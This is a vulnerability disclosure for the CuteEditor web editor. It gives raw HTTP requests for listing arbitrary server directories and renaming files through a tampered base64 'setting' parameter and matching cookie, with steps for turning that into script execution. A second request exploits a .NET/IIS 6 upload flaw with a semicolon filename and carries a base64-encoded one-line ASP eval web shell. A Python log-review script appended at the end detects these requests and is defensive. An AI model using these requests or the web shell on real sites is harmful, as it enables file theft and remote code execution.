CuteEditor for classic asp Vulnerability
This vulnerability in CuteEditor for classic ASP was discovered by accident. The editor is not widely used, so the details are released directly.
List any directory and file:
GET /aspedit/cuteeditor_files/Dialogs/browse_Img.asp?setting=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%3d&MP=/&Theme=Office2003 HTTP/1.1
Host: 192.168.223.250:8889
Cookie: CESecurity=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%3d;
After base64-decoding the setting parameter in the query string, you can add the extensions of other file types to be listed. The CESecurity value in the cookie must be kept consistent with the modified setting (including the added extensions), and all cookies starting with ASPSESSIONID must be deleted to prevent session validation failure.
Rename any file:
GET /aspedit/cuteeditor_files/Dialogs/browse_Img.asp?setting=MTAwMHwxMDAwMDB8MTAwMHwxMDAwfDEwMDB8L3VwbG9hZHN8L3VwbG9hZHN8L3VwbG9hZHN8L3RlbXBsYXRlc3wvdXBsb2Fkc3x0cnVlfHRydWV8dHJ1ZXx0cnVlfC5qcGcsLmpwZWcsLmdpZiwucG5nLHwuYXZpLC5tcGcsLm1wZWcsLm1wMywud212LC53YXYsfC50eHQsLmRvYywuZG9jeCwucGRmLC56aXAsLnJhciwuYXZpLC5tcGcsLm1wZWcsLm1wMywud2F2LC5zd2YsLmpwZywuanBlZywuZ2lmLC5wbmcsLmh0bSwueGxzLC5odG1sLC5ydGYsLndtdix8LnR4dCwucnRmLC5odG1sLC5odG0sLnhtbCx8ZW4tZW58ZmFsc2U=&MP=/uploads/&Theme=Office2003&loc=&action=renamefile&filename=/1.aspx&newname=/1.aspx.txt HTTP/1.1
Host: 192.168.223.250:8889
Cookie: CESecurity=MTAwMHwxMDAwMDB8MTAwMHwxMDAwfDEwMDB8L3VwbG9hZHN8L3VwbG9hZHN8L3VwbG9hZHN8L3RlbXBsYXRlc3wvdXBsb2Fkc3x0cnVlfHRydWV8dHJ1ZXx0cnVlfC5qcGcsLmpwZWcsLmdpZiwucG5nLHwuYXZpLC5tcGcsLm1wZWcsLm1wMywud212LC53YXYsfC50eHQsLmRvYywuZG9jeCwucGRmLC56aXAsLnJhciwuYXZpLC5tcGcsLm1wZWcsLm1wMywud2F2LC5zd2YsLmpwZywuanBlZywuZ2lmLC5wbmcsLmh0bSwueGxzLC5odG1sLC5ydGYsLndtdix8LnR4dCwucnRmLC5odG1sLC5odG0sLnhtbCx8ZW4tZW58ZmFsc2U%3D; ASPSESSIONIDASSRTAQC=MBLPJBJAGFPDNAAJNFENOELH
Exploitation:
1. Upload a jpg file and rename it.
2. If the upload directory does not have execute permission, or in other cases, list directories to look for information such as backup files, or rename other scripts so they can be downloaded and analyzed.
Also recorded here, a CuteEditor for .NET vulnerability under IIS 6:
POST /CuteSoft_Client/CuteEditor/uploader.ashx?_Addon=xhttp&_AddonGuid=e7d8104a-0ba6-4b47-8285-59d442e2b7d3&_PartialStart=0&_PartialFileName=1.asp; HTTP/1.1
Host: XXXXXX
Content-Length: 28

PCVldmFsIHJlcXVlc3QoImEiKSU+
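A log-review sketch for the requests shown above, added here as an example and not part of the original write-up or of CuteEditor's code: it decodes the client-supplied setting value and flags the request shapes this page describes. The field layout (fields starting with "/" are directories, fields starting with "." are extension lists, as seen when decoding the setting value in the rename request), the script-extension list, the finding strings and the sample URLs are assumptions constructed for illustration.

```python
import base64
from urllib.parse import urlsplit, unquote

# Assumed list of server-side script extensions to watch for.
SCRIPT_EXTS = (".asp", ".aspx", ".asa", ".cer", ".ashx")

def query_params(url):
    """Split the query on '&' only, so ';' and '+' inside values survive."""
    pairs = (p.split("=", 1) for p in urlsplit(url).query.split("&") if "=" in p)
    return {k: unquote(v) for k, v in pairs}

def decode_setting(value):
    """Base64-decode 'setting' into its pipe-separated fields ([] on error)."""
    try:
        raw = base64.b64decode(value + "=" * (-len(value) % 4))
    except ValueError:
        return []
    return raw.decode("latin-1").split("|")

def review(url):
    """Return findings for one logged request URL (path plus query string)."""
    path, q, out = urlsplit(url).path.lower(), query_params(url), []
    if path.endswith("/dialogs/browse_img.asp"):
        fields = decode_setting(q.get("setting", ""))
        # Assumed layout: "/..." fields are directories, ".x,.y," are extension lists.
        dirs = [f.rstrip("/") for f in fields if f.startswith("/")]
        exts = {e.lower() for f in fields if f.startswith(".") for e in f.split(",")}
        if exts & set(SCRIPT_EXTS):
            out.append("setting lists script extensions")
        mp = q.get("MP", "").rstrip("/")
        if dirs and not any(mp == d or mp.startswith(d + "/") for d in dirs):
            out.append("MP outside directories named in setting")
        names = q.get("filename", "") + "|" + q.get("newname", "")
        if q.get("action", "").lower() == "renamefile" and any(
                e in names.lower() for e in SCRIPT_EXTS):
            out.append("rename involves a script file")
    elif path.endswith("/uploader.ashx") and ";" in q.get("_PartialFileName", ""):
        out.append("semicolon in _PartialFileName")
    return out

def make_setting(ext_list):
    """Build a constructed (sample) setting value for the demo below."""
    raw = "1000|100000|/uploads|/templates|true|" + ext_list + "|en-en|false"
    return base64.b64encode(raw.encode()).decode()

if __name__ == "__main__":
    base = "/aspedit/cuteeditor_files/Dialogs/browse_Img.asp?setting="
    for url in (base + make_setting(".jpg,.png,") + "&MP=/uploads/",
                base + make_setting(".jpg,.asp,") + "&MP=/"):
        print(review(url))
```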
From: http://z-cg.com/